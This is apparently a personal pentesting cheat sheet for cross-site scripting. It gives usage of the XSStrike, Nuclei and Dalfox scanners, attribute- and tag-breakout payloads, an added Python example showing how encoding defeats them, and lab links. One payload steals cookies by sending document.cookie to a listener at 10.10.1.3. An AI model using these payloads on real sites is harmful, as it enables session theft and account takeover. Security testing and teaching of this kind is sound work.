yuyudhn's notes
XSS

Cross-site scripting cheat sheet


Last updated 11 months ago


Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Playground

Tools

XSStrike

XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.

# Install
git clone https://github.com/s0md3v/XSStrike
cd XSStrike
python3 -m venv xsstrike_env
source xsstrike_env/bin/activate
pip3 install -r requirements.txt

# run
python3 xsstrike.py -u "https://brutelogic.com.br/xss.php?a=fuzz" --fuzzer        # fuzz the parameter to see which characters and tags get reflected unfiltered
python3 xsstrike.py -u "https://brutelogic.com.br/xss.php" --crawl -l 3           # crawl the site to depth 3 and test the parameters it discovers
python3 xsstrike.py -u "https://brutelogic.com.br/xss.php?a=fuzz" --file xss.txt  # test the parameter with a custom payload list

Nuclei

Nuclei ships with several XSS detection templates that can be used to hunt low-hanging-fruit XSS.

nuclei -u "https://brutelogic.com.br/xss.php?a=" -dast -tags xss -silent

Dalfox

DalFox is a powerful open-source tool that focuses on automation, making it ideal for quickly scanning for XSS flaws and analyzing parameters. Its advanced testing engine and niche features are designed to streamline the process of detecting and verifying vulnerabilities.

Usage:

# basic scan
dalfox url https://brutelogic.com.br/xss.php

# scan with custom payload
dalfox url https://brutelogic.com.br/xss.php --custom-payload xss-payload.txt --skip-bav --only-custom-payload

Simple Payload

This is a simple payload that I commonly use for XSS testing.

" autofocus onfocus=alert(document.domain) x="
"/><img src=x onerror=alert(document.domain) />

For Cookie Stealing

<img src="x" onerror="fetch('http://10.10.1.3:8000?c=' + encodeURIComponent(document.cookie))">
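To see what a browser makes of the two "Simple Payload" entries above, and why attribute-encoding the reflected value on the server neutralises them, here is an added example (not part of the original notes): a hypothetical template that echoes a parameter into value="..." is rendered both unsafely and safely, and Python's html.parser shows which tags and event-handler attributes each result produces. The template, function names and the stand-in for the parameter are assumptions.

```python
import html
from html.parser import HTMLParser

# The two payloads from this page's "Simple Payload" section.
ATTRIBUTE_BREAKOUT = '" autofocus onfocus=alert(document.domain) x="'
TAG_BREAKOUT = '"/><img src=x onerror=alert(document.domain) />'

# Hypothetical page template: the query parameter "a" is echoed into value="..."
def render_unsafe(value):
    """Vulnerable: raw concatenation lets a quote in the input close the attribute."""
    return f'<input type="text" name="a" value="{value}">'

def render_safe(value):
    """Fixed: attribute-encode the input so ", <, >, & stay inside the attribute."""
    return f'<input type="text" name="a" value="{html.escape(value, quote=True)}">'

class TagCollector(HTMLParser):
    """Records every start tag with its attributes, i.e. what a browser would build."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def parse_tags(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

def event_handlers(markup):
    """(tag, attribute) pairs for on* attributes: any hit means input became script."""
    return [(tag, name) for tag, attrs in parse_tags(markup)
            for name in attrs if name.startswith("on")]

def reflected_value(markup):
    """The value attribute of the first <input>, after the parser decodes entities."""
    for tag, attrs in parse_tags(markup):
        if tag == "input":
            return attrs.get("value")
    return None

if __name__ == "__main__":
    for payload in (ATTRIBUTE_BREAKOUT, TAG_BREAKOUT):
        print("unsafe:", event_handlers(render_unsafe(payload)))  # handler present
        print("safe:  ", event_handlers(render_safe(payload)))    # []
        # The encoded page still shows the user exactly what they typed.
        print("round-trips:", reflected_value(render_safe(payload)) == payload)
```

The same parse-and-inspect check works as a quick regression test for any template that reflects input into an attribute.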

Resources

• XSStrike: https://github.com/s0md3v/XSStrike
• Nuclei XSS
• Dalfox: https://github.com/hahwul/dalfox
• https://tryhackme.com/r/room/axss
• https://brutelogic.com.br/xss.php
• https://xss-labs.abay.sh/xss/
• https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
• https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
• https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/xss.txt